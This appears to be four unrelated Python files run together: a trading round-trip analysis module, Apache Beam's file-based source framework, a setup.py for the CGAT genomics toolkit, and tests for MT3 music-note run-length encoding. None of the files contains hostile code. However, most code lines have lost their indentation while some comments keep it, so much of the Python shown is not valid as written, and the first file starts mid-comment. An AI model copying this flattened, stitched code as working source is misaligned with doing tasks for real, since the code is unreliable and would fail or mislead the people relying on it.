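#         index=pd.to_datetime(['2004-01-09 12:00', '2004-01-09 13:00']))
#     merged = _groupby_consecutive(txn)
#     # expected: one row with amount == 20 and price == (10*50 + 10*100)/20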
def extract_round_trips(transactions,
portfolio_value=None):
"""Group transactions into "round trips". First, transactions are
grouped by day and directionality. Then, long and short
transactions are matched to create round-trip round_trips for which
PnL, duration and returns are computed. Crossings where a position
changes from long to short and vice-versa are handled correctly.
Under the hood, we reconstruct the individual shares in a
portfolio over time and match round_trips in a FIFO-order.
For example, the following transactions would constitute one round trip:
index amount price symbol
2004-01-09 12:18:01 10 50 'AAPL'
2004-01-09 15:12:53 10 100 'AAPL'
2004-01-13 14:41:23 -10 100 'AAPL'
2004-01-13 15:23:34 -10 200 'AAPL'
    First, the first two and the last two transactions will be merged into
    two single transactions (computing the price via vwap). Then, during
the portfolio reconstruction, the two resulting transactions will
be merged and result in 1 round-trip trade with a PnL of
(150 * 20) - (75 * 20) = 1500.
Note, that round trips do not have to close out positions
completely. For example, we could have removed the last
transaction in the example above and still generated a round-trip
over 10 shares with 10 shares left in the portfolio to be matched
with a later transaction.
Parameters
----------
transactions : pd.DataFrame
        Prices and amounts of executed trades. One row per trade.
- See full explanation in tears.create_full_tear_sheet
portfolio_value : pd.Series (optional)
Portfolio value (all net assets including cash) over time.
        Note that portfolio_value needs to be the beginning-of-day value, so
        either use .shift() or positions.sum(axis='columns') / (1 + returns).
Returns
-------
round_trips : pd.DataFrame
        DataFrame with one row per round trip. The returns column
        contains returns with respect to the portfolio value while
        rt_returns are the returns with regard to the capital invested
        in that particular round trip.
"""
transactions = _groupby_consecutive(transactions)
roundtrips = []
for sym, trans_sym in transactions.groupby('symbol'):
trans_sym = trans_sym.sort_index()
price_stack = deque()
dt_stack = deque()
trans_sym['signed_price'] = trans_sym.price * \
np.sign(trans_sym.amount)
trans_sym['abs_amount'] = trans_sym.amount.abs().astype(int)
for dt, t in trans_sym.iterrows():
if t.price < 0:
                warnings.warn('Negative price detected, ignoring for '
                              'round-trip.')
continue
indiv_prices = [t.signed_price] * t.abs_amount
if (len(price_stack) == 0) or \
(copysign(1, price_stack[-1]) == copysign(1, t.amount)):
price_stack.extend(indiv_prices)
dt_stack.extend([dt] * len(indiv_prices))
else:
# Close round-trip
pnl = 0
invested = 0
cur_open_dts = []
for price in indiv_prices:
if len(price_stack) != 0 and \
(copysign(1, price_stack[-1]) != copysign(1, price)):
# Retrieve first dt, stock-price pair from
# stack
prev_price = price_stack.popleft()
prev_dt = dt_stack.popleft()
pnl += -(price + prev_price)
cur_open_dts.append(prev_dt)
invested += abs(prev_price)
else:
# Push additional stock-prices onto stack
price_stack.append(price)
dt_stack.append(dt)
roundtrips.append({'pnl': pnl,
'open_dt': cur_open_dts[0],
'close_dt': dt,
'long': price < 0,
'rt_returns': pnl / invested,
'symbol': sym,
})
roundtrips = pd.DataFrame(roundtrips)
roundtrips['duration'] = roundtrips['close_dt'].sub(roundtrips['open_dt'])
if portfolio_value is not None:
# Need to normalize so that we can join
pv = pd.DataFrame(portfolio_value,
columns=['portfolio_value'])\
.assign(date=portfolio_value.index)
roundtrips['date'] = roundtrips.close_dt.apply(lambda x:
x.replace(hour=0,
minute=0,
second=0))
tmp = (roundtrips.set_index('date')
.join(pv.set_index('date'), lsuffix='_')
.reset_index())
roundtrips['returns'] = tmp.pnl / tmp.portfolio_value
roundtrips = roundtrips.drop('date', axis='columns')
return roundtrips
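# An illustrative sketch, not part of the library: running the example from the
# docstring above through extract_round_trips. The symbol and prices are the
# hypothetical ones used in that docstring.
#
#     import pandas as pd
#
#     transactions = pd.DataFrame(
#         {'amount': [10, 10, -10, -10],
#          'price': [50.0, 100.0, 100.0, 200.0],
#          'symbol': ['AAPL'] * 4},
#         index=pd.to_datetime(['2004-01-09 12:18:01', '2004-01-09 15:12:53',
#                               '2004-01-13 14:41:23', '2004-01-13 15:23:34']))
#     rts = extract_round_trips(transactions)
#     # expected: a single round trip with pnl == (150 - 75) * 20 == 1500.0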
def add_closing_transactions(positions, transactions):
"""
Appends transactions that close out all positions at the end of
the timespan covered by positions data. Utilizes pricing information
in the positions DataFrame to determine closing price.
Parameters
----------
positions : pd.DataFrame
The positions that the strategy takes over time.
transactions : pd.DataFrame
        Prices and amounts of executed trades. One row per trade.
- See full explanation in tears.create_full_tear_sheet
Returns
-------
closed_txns : pd.DataFrame
Transactions with closing transactions appended.
"""
closed_txns = transactions[['symbol', 'amount', 'price']]
pos_at_end = positions.drop('cash', axis=1).iloc[-1]
open_pos = pos_at_end.replace(0, np.nan).dropna()
    # Add closing transactions one second after the close to be sure
    # they don't conflict with other transactions executed at that time.
end_dt = open_pos.name + pd.Timedelta(seconds=1)
for sym, ending_val in open_pos.iteritems():
txn_sym = transactions[transactions.symbol == sym]
ending_amount = txn_sym.amount.sum()
ending_price = ending_val / ending_amount
closing_txn = OrderedDict([
('amount', -ending_amount),
('price', ending_price),
('symbol', sym),
])
closing_txn = pd.DataFrame(closing_txn, index=[end_dt])
closed_txns = closed_txns.append(closing_txn)
closed_txns = closed_txns[closed_txns.amount != 0]
return closed_txns
def apply_sector_mappings_to_round_trips(round_trips, sector_mappings):
"""
Translates round trip symbols to sectors.
Parameters
----------
round_trips : pd.DataFrame
DataFrame with one row per round trip trade.
- See full explanation in round_trips.extract_round_trips
sector_mappings : dict or pd.Series, optional
Security identifier to sector mapping.
Security ids as keys, sectors as values.
Returns
-------
sector_round_trips : pd.DataFrame
Round trips with symbol names replaced by sector names.
"""
sector_round_trips = round_trips.copy()
sector_round_trips.symbol = sector_round_trips.symbol.apply(
lambda x: sector_mappings.get(x, 'No Sector Mapping'))
sector_round_trips = sector_round_trips.dropna(axis=0)
return sector_round_trips
def gen_round_trip_stats(round_trips):
"""Generate various round-trip statistics.
Parameters
----------
round_trips : pd.DataFrame
DataFrame with one row per round trip trade.
- See full explanation in round_trips.extract_round_trips
Returns
-------
stats : dict
A dictionary where each value is a pandas DataFrame containing
various round-trip statistics.
See also
--------
round_trips.print_round_trip_stats
"""
stats = {}
stats['pnl'] = agg_all_long_short(round_trips, 'pnl', PNL_STATS)
stats['summary'] = agg_all_long_short(round_trips, 'pnl',
SUMMARY_STATS)
stats['duration'] = agg_all_long_short(round_trips, 'duration',
DURATION_STATS)
stats['returns'] = agg_all_long_short(round_trips, 'returns',
RETURN_STATS)
stats['symbols'] = \
round_trips.groupby('symbol')['returns'].agg(RETURN_STATS).T
return stats
def print_round_trip_stats(round_trips, hide_pos=False):
"""Print various round-trip statistics. Tries to pretty-print tables
with HTML output if run inside IPython NB.
Parameters
----------
round_trips : pd.DataFrame
DataFrame with one row per round trip trade.
- See full explanation in round_trips.extract_round_trips
See also
--------
round_trips.gen_round_trip_stats
"""
stats = gen_round_trip_stats(round_trips)
print_table(stats['summary'], float_format='{:.2f}'.format,
name='Summary stats')
print_table(stats['pnl'], float_format='${:.2f}'.format, name='PnL stats')
print_table(stats['duration'], float_format='{:.2f}'.format,
name='Duration stats')
print_table(stats['returns'] * 100, float_format='{:.2f}%'.format,
name='Return stats')
if not hide_pos:
stats['symbols'].columns = stats['symbols'].columns.map(format_asset)
print_table(stats['symbols'] * 100,
float_format='{:.2f}%'.format, name='Symbol stats')
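# An illustrative sketch, not part of the library, of the typical flow through
# this module. It assumes `positions`, `transactions` and `returns` objects as
# described in tears.create_full_tear_sheet.
#
#     txns_closed = add_closing_transactions(positions, transactions)
#     rts = extract_round_trips(
#         txns_closed,
#         portfolio_value=positions.sum(axis='columns') / (1 + returns))
#     print_round_trip_stats(rts)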
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A framework for developing sources for new file types.
To create a source for a new file type a sub-class of :class:`FileBasedSource`
should be created. Sub-classes of :class:`FileBasedSource` must implement the
method :meth:`FileBasedSource.read_records()`. Please read the documentation of
that method for more details.
For an example implementation of :class:`FileBasedSource` see
:class:`~apache_beam.io._AvroSource`.
"""
from six import integer_types
from six import string_types
from apache_beam.internal import pickler
from apache_beam.io import concat_source
from apache_beam.io import iobase
from apache_beam.io import range_trackers
from apache_beam.io.filesystem import CompressionTypes
from apache_beam.io.filesystems import FileSystems
from apache_beam.io.restriction_trackers import OffsetRange
from apache_beam.options.value_provider import StaticValueProvider
from apache_beam.options.value_provider import ValueProvider
from apache_beam.options.value_provider import check_accessible
from apache_beam.transforms.core import DoFn
from apache_beam.transforms.core import ParDo
from apache_beam.transforms.core import PTransform
from apache_beam.transforms.display import DisplayDataItem
from apache_beam.transforms.util import Reshuffle
MAX_NUM_THREADS_FOR_SIZE_ESTIMATION = 25
__all__ = ['FileBasedSource']
class FileBasedSource(iobase.BoundedSource):
"""A :class:`~apache_beam.io.iobase.BoundedSource` for reading a file glob of
a given type."""
MIN_NUMBER_OF_FILES_TO_STAT = 100
MIN_FRACTION_OF_FILES_TO_STAT = 0.01
def __init__(self,
file_pattern,
min_bundle_size=0,
compression_type=CompressionTypes.AUTO,
splittable=True,
validate=True):
"""Initializes :class:`FileBasedSource`.
Args:
      file_pattern (str): the file glob to read, a string or a
        :class:`~apache_beam.options.value_provider.ValueProvider`
        (placeholder to inject a runtime value).
      min_bundle_size (int): minimum size of bundles that should be generated
when performing initial splitting on this source.
compression_type (str): Used to handle compressed output files.
Typical value is :attr:`CompressionTypes.AUTO
<apache_beam.io.filesystem.CompressionTypes.AUTO>`,
in which case the final file path's extension will be used to detect
the compression.
splittable (bool): whether :class:`FileBasedSource` should try to
logically split a single file into data ranges so that different parts
of the same file can be read in parallel. If set to :data:`False`,
:class:`FileBasedSource` will prevent both initial and dynamic splitting
of sources for single files. File patterns that represent multiple files
may still get split into sources for individual files. Even if set to
:data:`True` by the user, :class:`FileBasedSource` may choose to not
split the file, for example, for compressed files where currently it is
not possible to efficiently read a data range without decompressing the
whole file.
validate (bool): Boolean flag to verify that the files exist during the
pipeline creation time.
Raises:
~exceptions.TypeError: when **compression_type** is not valid or if
**file_pattern** is not a :class:`str` or a
:class:`~apache_beam.options.value_provider.ValueProvider`.
~exceptions.ValueError: when compression and splittable files are
specified.
~exceptions.IOError: when the file pattern specified yields an empty
result.
"""
if not isinstance(file_pattern, (string_types, ValueProvider)):
raise TypeError('%s: file_pattern must be of type string'
' or ValueProvider; got %r instead'
% (self.__class__.__name__, file_pattern))
if isinstance(file_pattern, string_types):
file_pattern = StaticValueProvider(str, file_pattern)
self._pattern = file_pattern
self._concat_source = None
self._min_bundle_size = min_bundle_size
if not CompressionTypes.is_valid_compression_type(compression_type):
raise TypeError('compression_type must be CompressionType object but '
'was %s' % type(compression_type))
self._compression_type = compression_type
self._splittable = splittable
if validate and file_pattern.is_accessible():
self._validate()
def display_data(self):
return {'file_pattern': DisplayDataItem(str(self._pattern),
label="File Pattern"),
'compression': DisplayDataItem(str(self._compression_type),
label='Compression Type')}
@check_accessible(['_pattern'])
def _get_concat_source(self):
if self._concat_source is None:
pattern = self._pattern.get()
single_file_sources = []
match_result = FileSystems.match([pattern])[0]
files_metadata = match_result.metadata_list
# We create a reference for FileBasedSource that will be serialized along
# with each _SingleFileSource. To prevent this FileBasedSource from having
# a reference to ConcatSource (resulting in quadratic space complexity)
# we clone it here.
file_based_source_ref = pickler.loads(pickler.dumps(self))
for file_metadata in files_metadata:
file_name = file_metadata.path
file_size = file_metadata.size_in_bytes
if file_size == 0:
continue # Ignoring empty file.
# We determine splittability of this specific file.
splittable = (
self.splittable and
_determine_splittability_from_compression_type(
file_name, self._compression_type))
single_file_source = _SingleFileSource(
file_based_source_ref, file_name,
0,
file_size,
min_bundle_size=self._min_bundle_size,
splittable=splittable)
single_file_sources.append(single_file_source)
self._concat_source = concat_source.ConcatSource(single_file_sources)
return self._concat_source
def open_file(self, file_name):
return FileSystems.open(
file_name, 'application/octet-stream',
compression_type=self._compression_type)
@check_accessible(['_pattern'])
def _validate(self):
"""Validate if there are actual files in the specified glob pattern
"""
pattern = self._pattern.get()
# Limit the responses as we only want to check if something exists
match_result = FileSystems.match([pattern], limits=[1])[0]
if len(match_result.metadata_list) <= 0:
raise IOError(
'No files found based on the file pattern %s' % pattern)
def split(
self, desired_bundle_size=None, start_position=None, stop_position=None):
return self._get_concat_source().split(
desired_bundle_size=desired_bundle_size,
start_position=start_position,
stop_position=stop_position)
@check_accessible(['_pattern'])
def estimate_size(self):
pattern = self._pattern.get()
match_result = FileSystems.match([pattern])[0]
return sum([f.size_in_bytes for f in match_result.metadata_list])
def read(self, range_tracker):
return self._get_concat_source().read(range_tracker)
def get_range_tracker(self, start_position, stop_position):
return self._get_concat_source().get_range_tracker(start_position,
stop_position)
def read_records(self, file_name, offset_range_tracker):
"""Returns a generator of records created by reading file 'file_name'.
Args:
file_name: a ``string`` that gives the name of the file to be read. Method
``FileBasedSource.open_file()`` must be used to open the file
and create a seekable file object.
      offset_range_tracker: an object of type ``OffsetRangeTracker``. This
defines the byte range of the file that should be
read. See documentation in
``iobase.BoundedSource.read()`` for more information
                            on reading records while complying with the range
defined by a given ``RangeTracker``.
Returns:
an iterator that gives the records read from the given file.
"""
raise NotImplementedError
@property
def splittable(self):
return self._splittable
def _determine_splittability_from_compression_type(
file_path, compression_type):
if compression_type == CompressionTypes.AUTO:
compression_type = CompressionTypes.detect_compression_type(file_path)
return compression_type == CompressionTypes.UNCOMPRESSED
class _SingleFileSource(iobase.BoundedSource):
"""Denotes a source for a specific file type."""
def __init__(self, file_based_source, file_name, start_offset, stop_offset,
min_bundle_size=0, splittable=True):
if not isinstance(start_offset, integer_types):
raise TypeError(
'start_offset must be a number. Received: %r' % start_offset)
if stop_offset != range_trackers.OffsetRangeTracker.OFFSET_INFINITY:
if not isinstance(stop_offset, integer_types):
raise TypeError(
'stop_offset must be a number. Received: %r' % stop_offset)
if start_offset >= stop_offset:
raise ValueError(
'start_offset must be smaller than stop_offset. Received %d and %d '
'for start and stop offsets respectively' %
(start_offset, stop_offset))
self._file_name = file_name
self._is_gcs_file = file_name.startswith('gs://') if file_name else False
self._start_offset = start_offset
self._stop_offset = stop_offset
self._min_bundle_size = min_bundle_size
self._file_based_source = file_based_source
self._splittable = splittable
def split(self, desired_bundle_size, start_offset=None, stop_offset=None):
if start_offset is None:
start_offset = self._start_offset
if stop_offset is None:
stop_offset = self._stop_offset
if self._splittable:
splits = OffsetRange(start_offset, stop_offset).split(
desired_bundle_size, self._min_bundle_size)
for split in splits:
yield iobase.SourceBundle(
split.stop - split.start,
_SingleFileSource(
# Copying this so that each sub-source gets a fresh instance.
pickler.loads(pickler.dumps(self._file_based_source)),
self._file_name,
split.start,
split.stop,
min_bundle_size=self._min_bundle_size,
splittable=self._splittable),
split.start,
split.stop)
else:
# Returning a single sub-source with end offset set to OFFSET_INFINITY (so
# that all data of the source gets read) since this source is
# unsplittable. Choosing size of the file as end offset will be wrong for
      # certain unsplittable sources, e.g., compressed sources.
yield iobase.SourceBundle(
stop_offset - start_offset,
_SingleFileSource(
self._file_based_source,
self._file_name,
start_offset,
range_trackers.OffsetRangeTracker.OFFSET_INFINITY,
min_bundle_size=self._min_bundle_size,
splittable=self._splittable
),
start_offset,
range_trackers.OffsetRangeTracker.OFFSET_INFINITY
)
def estimate_size(self):
return self._stop_offset - self._start_offset
def get_range_tracker(self, start_position, stop_position):
if start_position is None:
start_position = self._start_offset
if stop_position is None:
# If file is unsplittable we choose OFFSET_INFINITY as the default end
# offset so that all data of the source gets read. Choosing size of the
      # file as end offset will be wrong for certain unsplittable sources,
      # e.g., compressed sources.
stop_position = (
self._stop_offset if self._splittable
else range_trackers.OffsetRangeTracker.OFFSET_INFINITY)
range_tracker = range_trackers.OffsetRangeTracker(
start_position, stop_position)
if not self._splittable:
range_tracker = range_trackers.UnsplittableRangeTracker(range_tracker)
return range_tracker
def read(self, range_tracker):
return self._file_based_source.read_records(self._file_name, range_tracker)
def default_output_coder(self):
return self._file_based_source.default_output_coder()
class _ExpandIntoRanges(DoFn):
def __init__(
self, splittable, compression_type, desired_bundle_size, min_bundle_size):
self._desired_bundle_size = desired_bundle_size
self._min_bundle_size = min_bundle_size
self._splittable = splittable
self._compression_type = compression_type
def process(self, element, *args, **kwargs):
match_results = FileSystems.match([element])
for metadata in match_results[0].metadata_list:
splittable = (
self._splittable and
_determine_splittability_from_compression_type(
metadata.path, self._compression_type))
if splittable:
for split in OffsetRange(
0, metadata.size_in_bytes).split(
self._desired_bundle_size, self._min_bundle_size):
yield (metadata, split)
else:
yield (metadata, OffsetRange(
0, range_trackers.OffsetRangeTracker.OFFSET_INFINITY))
class _ReadRange(DoFn):
def __init__(self, source_from_file):
self._source_from_file = source_from_file
def process(self, element, *args, **kwargs):
metadata, range = element
source = self._source_from_file(metadata.path)
# Following split() operation has to be performed to create a proper
# _SingleFileSource. Otherwise what we have is a ConcatSource that contains
    # a single _SingleFileSource. ConcatSource.read() expects a RangeTracker for
# sub-source range and reads full sub-sources (not byte ranges).
source = list(source.split(float('inf')))[0].source
for record in source.read(range.new_tracker()):
yield record
class ReadAllFiles(PTransform):
"""A Read transform that reads a PCollection of files.
Pipeline authors should not use this directly. This is to be used by Read
  PTransform authors who wish to implement file-based Read transforms that
read a PCollection of files.
"""
def __init__(
self, splittable, compression_type, desired_bundle_size, min_bundle_size,
source_from_file):
"""
Args:
      splittable: If False, files won't be split into sub-ranges. If True,
                  files may or may not be split into data ranges.
compression_type: A ``CompressionType`` object that specifies the
compression type of the files that will be processed. If
``CompressionType.AUTO``, system will try to automatically
determine the compression type based on the extension of
files.
desired_bundle_size: the desired size of data ranges that should be
generated when splitting a file into data ranges.
min_bundle_size: minimum size of data ranges that should be generated when
splitting a file into data ranges.
source_from_file: a function that produces a ``BoundedSource`` given a
file name. System will use this function to generate
``BoundedSource`` objects for file paths. Note that file
paths passed to this will be for individual files, not
for file patterns even if the ``PCollection`` of files
processed by the transform consist of file patterns.
"""
self._splittable = splittable
self._compression_type = compression_type
self._desired_bundle_size = desired_bundle_size
self._min_bundle_size = min_bundle_size
self._source_from_file = source_from_file
def expand(self, pvalue):
return (pvalue
| 'ExpandIntoRanges' >> ParDo(_ExpandIntoRanges(
self._splittable, self._compression_type,
self._desired_bundle_size, self._min_bundle_size))
| 'Reshard' >> Reshuffle()
| 'ReadRange' >> ParDo(_ReadRange(self._source_from_file)))
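# An illustrative sketch, not part of this module: a "read all" transform for a
# custom file type might wrap ReadAllFiles roughly like this. ``_MyLineSource``
# refers to the hypothetical sub-class sketched near the top of this file, and
# the bundle sizes are arbitrary.
#
#     class ReadAllMyFiles(PTransform):
#       def expand(self, pvalue):
#         return pvalue | ReadAllFiles(
#             splittable=True,
#             compression_type=CompressionTypes.AUTO,
#             desired_bundle_size=64 * 1024 * 1024,
#             min_bundle_size=0,
#             source_from_file=lambda path: _MyLineSource(path))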
|
|
import glob
import sys
import os
import subprocess
import re
########################################################################
#######################################################################
# Check for dependencies
#
# Is there a way to do this more elegantly?
# 1. Run "pip install numpy"
# 2. Wrap inside functions (works for numpy/pysam, but not cython)
try:
import numpy
except ImportError:
raise ImportError(
"the CGAT code collection requires numpy to be installed "
"before running setup.py (pip install numpy)")
try:
import Cython
except ImportError:
raise ImportError(
"the CGAT code collection requires cython to "
"be installed before running setup.py (pip install cython)")
try:
import pysam
except ImportError:
raise ImportError(
"the CGAT code collection requires pysam to "
"be installed before running setup.py (pip install pysam)")
########################################################################
########################################################################
# Import setuptools
# Use existing setuptools, otherwise try ez_setup.
try:
import setuptools
except ImportError:
# try to get via ez_setup
# ez_setup did not work on all machines tested as
# it uses curl with https protocol, which is not
# enabled in ScientificLinux
import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages, Extension
from distutils.version import LooseVersion
if LooseVersion(setuptools.__version__) < LooseVersion('1.1'):
print(("Version detected:", LooseVersion(setuptools.__version__)))
raise ImportError(
"the CGAT code collection requires setuptools 1.1 higher")
from Cython.Distutils import build_ext
########################################################################
########################################################################
IS_OSX = sys.platform == 'darwin'
########################################################################
########################################################################
# collect CGAT version
sys.path.insert(0, "scripts")
import version
version = version.__version__
###############################################################
###############################################################
# Check for external dependencies
#
# Not exhaustive, simply execute a representative tool from a toolkit.
external_dependencies = (
("wigToBigWig", "UCSC tools", 255),
("bedtools", "bedtools", 0),
)
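# Each entry above is (executable to invoke, toolkit name used in warning
# messages, return code expected when the tool is run without arguments).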
for tool, toolkit, expected in external_dependencies:
try:
# py3k
from subprocess import DEVNULL
except ImportError:
DEVNULL = open(os.devnull, 'wb')
try:
retcode = subprocess.call(tool, shell=True,
stdout=DEVNULL, stderr=DEVNULL)
except OSError as msg:
print(("WARNING: dependency check for %s failed: %s" % (toolkit, msg)))
continue
# UCSC tools return 255 when called without arguments
if retcode != expected:
print(("WARNING: dependency check for %s(%s) failed, error %i" %
(toolkit, tool, retcode)))
###############################################################
###############################################################
# Define dependencies
#
# Perform a CGAT Code Collection Installation
INSTALL_CGAT_CODE_COLLECTION = True
major, minor1, minor2, s, tmp = sys.version_info
if (major == 2 and minor1 < 7) or major < 2:
raise SystemExit("""CGAT requires Python 2.7 or later.""")
#####################################################################
#####################################################################
# Code to install dependencies from a repository
#####################################################################
# Modified from http://stackoverflow.com/a/9125399
#####################################################################
def which(program):
"""
Detect whether or not a program is installed.
Thanks to http://stackoverflow.com/a/377028/70191
"""
def is_exe(fpath):
return os.path.exists(fpath) and os.access(fpath, os.X_OK)
fpath, _ = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ['PATH'].split(os.pathsep):
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
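# Illustrative behaviour (paths are hypothetical):
#   which("bedtools")     -> "/usr/bin/bedtools" if found on PATH
#   which("missing-tool") -> None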
REPO_REQUIREMENT = re.compile(
r'^-e (?P<link>(?P<vcs>git|svn|hg|bzr).+#egg=(?P<package>.+)-(?P<version>\d(?:\.\d)*))$')
HTTPS_REQUIREMENT = re.compile(
r'^-e (?P<link>.*).+#(?P<package>.+)-(?P<version>\d(?:\.\d)*)$')
install_requires = []
dependency_links = []
for requirement in (
l.strip() for l in open('requires.txt') if not l.startswith("#")):
match = REPO_REQUIREMENT.match(requirement)
if match:
assert which(match.group('vcs')) is not None, \
("VCS '%(vcs)s' must be installed in order to "
"install %(link)s" % match.groupdict())
install_requires.append("%(package)s==%(version)s" % match.groupdict())
dependency_links.append(match.group('link'))
continue
if requirement.startswith("https"):
install_requires.append(requirement)
continue
match = HTTPS_REQUIREMENT.match(requirement)
if match:
install_requires.append("%(package)s>=%(version)s" % match.groupdict())
dependency_links.append(match.group('link'))
continue
install_requires.append(requirement)
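# Illustrative requires.txt lines and how the loop above handles them
# (package names and URLs are made up):
#   -e git+https://example.org/repo.git#egg=somepkg-1.0
#       -> install_requires gets "somepkg==1.0"; dependency_links gets the link
#   numpy>=1.7
#       -> appended to install_requires unchanged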
if major == 2:
install_requires.extend(['web.py>=0.37',
'xlwt>=0.7.4',
'matplotlib-venn>=0.5'])
elif major == 3:
pass
if INSTALL_CGAT_CODE_COLLECTION:
cgat_packages = find_packages(exclude=["CGATPipelines*", "scripts*"])
else:
cgat_packages = find_packages(exclude=["scripts*"])
# rename scripts to CGATScripts
cgat_packages.append("CGATScripts")
cgat_package_dirs = {'CGAT': 'CGAT',
'CGATScripts': 'scripts',
'CGATPipelines': 'CGATPipelines'}
##########################################################
##########################################################
# Classifiers
classifiers = """
Development Status :: 3 - Alpha
Intended Audience :: Science/Research
Intended Audience :: Developers
License :: OSI Approved
Programming Language :: Python
Topic :: Software Development
Topic :: Scientific/Engineering
Operating System :: POSIX
Operating System :: Unix
Operating System :: MacOS
"""
setup(
# package information
name='CGATPipelines',
version=version,
description='CGAT : the Computational Genomics Analysis Toolkit',
author='Andreas Heger',
author_email='andreas.heger@gmail.com',
license="MIT",
platforms=["any"],
keywords="computational genomics",
long_description='CGAT : the Computational Genomics Analysis Toolkit',
classifiers=[_f for _f in classifiers.split("\n") if _f],
url="http://www.cgat.org/cgat/Tools/",
# package contents
packages=cgat_packages,
package_dir=cgat_package_dirs,
include_package_data=True,
entry_points={
'console_scripts': ['cgatflow = CGATPipelines.cgatflow:main']
},
# dependencies
install_requires=install_requires,
dependency_links=dependency_links,
# extension modules
ext_modules=[],
cmdclass={'build_ext': build_ext},
# other options
zip_safe=False,
test_suite="tests",
)
|
|
# Copyright 2022 The MT3 Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for note_sequences."""
from mt3 import event_codec
from mt3 import note_sequences
from mt3 import run_length_encoding
import note_seq
import numpy as np
import tensorflow as tf
codec = event_codec.Codec(
max_shift_steps=100,
steps_per_second=100,
event_ranges=[
event_codec.EventRange('pitch', note_seq.MIN_MIDI_PITCH,
note_seq.MAX_MIDI_PITCH),
event_codec.EventRange('velocity', 0, 127),
event_codec.EventRange('drum', note_seq.MIN_MIDI_PITCH,
note_seq.MAX_MIDI_PITCH),
event_codec.EventRange('program', note_seq.MIN_MIDI_PROGRAM,
note_seq.MAX_MIDI_PROGRAM),
event_codec.EventRange('tie', 0, 0)
])
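# Token ids used throughout these tests (inferred from the codec definition
# above and the hard-coded values asserted below; the codec assigns ids
# contiguously, with shift events first):
#   shift (1 step = 10 ms) -> token 1
#   pitch p                -> token 101 + p  (e.g. pitch 61 -> 162)
#   velocity v             -> token 229 + v  (e.g. velocity 127 -> 356)
#   drum d                 -> token 357 + d  (e.g. drum 37 -> 394)
#   program p              -> token 485 + p  (e.g. program 40 -> 525)
#   tie                    -> token 613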
class RunLengthEncodingTest(tf.test.TestCase):
def test_encode_and_index_note_sequence(self):
ns = note_seq.NoteSequence()
ns.notes.add(start_time=1.0,
end_time=1.1,
pitch=61,
velocity=100)
ns.notes.add(start_time=2.0,
end_time=2.1,
pitch=62,
velocity=100)
ns.notes.add(start_time=3.0,
end_time=3.1,
pitch=63,
velocity=100)
ns.total_time = ns.notes[-1].end_time
frame_times = np.arange(0, 4, step=.001)
event_times, event_values = note_sequences.note_sequence_to_onsets(ns)
events, event_start_indices, event_end_indices, _, _ = run_length_encoding.encode_and_index_events(
state=None, event_times=event_times, event_values=event_values,
encode_event_fn=note_sequences.note_event_data_to_events,
codec=codec, frame_times=frame_times)
self.assertEqual(len(frame_times), len(event_start_indices))
self.assertEqual(len(frame_times), len(event_end_indices))
self.assertLen(events, 403)
expected_events = ([1] * 100 +
[162] +
[1] * 100 +
[163] +
[1] * 100 +
[164] +
[1] * 100)
np.testing.assert_array_equal(expected_events, events)
self.assertEqual(event_start_indices[0], 0)
self.assertEqual(event_end_indices[0], 0)
self.assertEqual(162, events[100])
self.assertEqual(1.0, frame_times[1000])
self.assertEqual(event_start_indices[1000], 100)
self.assertEqual(event_end_indices[1000], 100)
self.assertEqual(163, events[201])
self.assertEqual(2.0, frame_times[2000])
self.assertEqual(event_start_indices[2000], 201)
self.assertEqual(event_end_indices[2000], 201)
self.assertEqual(164, events[302])
self.assertEqual(3.0, frame_times[3000])
self.assertEqual(event_start_indices[3000], 302)
self.assertEqual(event_end_indices[3000], 302)
self.assertEqual(1, events[-1])
self.assertEqual(3.999, frame_times[-1])
self.assertEqual(event_start_indices[-1], 402)
self.assertEqual(event_end_indices[-1], len(expected_events))
def test_encode_and_index_note_sequence_velocity(self):
ns = note_seq.NoteSequence()
ns.notes.add(start_time=1.0,
end_time=3.0,
pitch=61,
velocity=1)
ns.notes.add(start_time=2.0,
end_time=4.0,
pitch=62,
velocity=127)
ns.total_time = ns.notes[-1].end_time
frame_times = np.arange(0, 4, step=.001)
event_times, event_values = (
note_sequences.note_sequence_to_onsets_and_offsets(ns))
events, event_start_indices, event_end_indices, _, _ = run_length_encoding.encode_and_index_events(
state=None, event_times=event_times, event_values=event_values,
encode_event_fn=note_sequences.note_event_data_to_events,
codec=codec, frame_times=frame_times)
self.assertEqual(len(frame_times), len(event_start_indices))
self.assertEqual(len(frame_times), len(event_end_indices))
self.assertLen(events, 408)
expected_events = ([1] * 100 +
[230, 162] +
[1] * 100 +
[356, 163] +
[1] * 100 +
[229, 162] +
[1] * 100 +
[229, 163])
np.testing.assert_array_equal(expected_events, events)
self.assertEqual(event_start_indices[0], 0)
self.assertEqual(event_end_indices[0], 0)
self.assertEqual(230, events[100])
self.assertEqual(162, events[101])
self.assertEqual(1.0, frame_times[1000])
self.assertEqual(event_start_indices[1000], 100)
self.assertEqual(event_end_indices[1000], 100)
self.assertEqual(356, events[202])
self.assertEqual(163, events[203])
self.assertEqual(2.0, frame_times[2000])
self.assertEqual(event_start_indices[2000], 202)
self.assertEqual(event_end_indices[2000], 202)
self.assertEqual(229, events[304])
self.assertEqual(162, events[305])
self.assertEqual(3.0, frame_times[3000])
self.assertEqual(event_start_indices[3000], 304)
self.assertEqual(event_end_indices[3000], 304)
self.assertEqual(229, events[406])
self.assertEqual(163, events[407])
self.assertEqual(3.999, frame_times[-1])
self.assertEqual(event_start_indices[-1], 405)
self.assertEqual(event_end_indices[-1], len(expected_events))
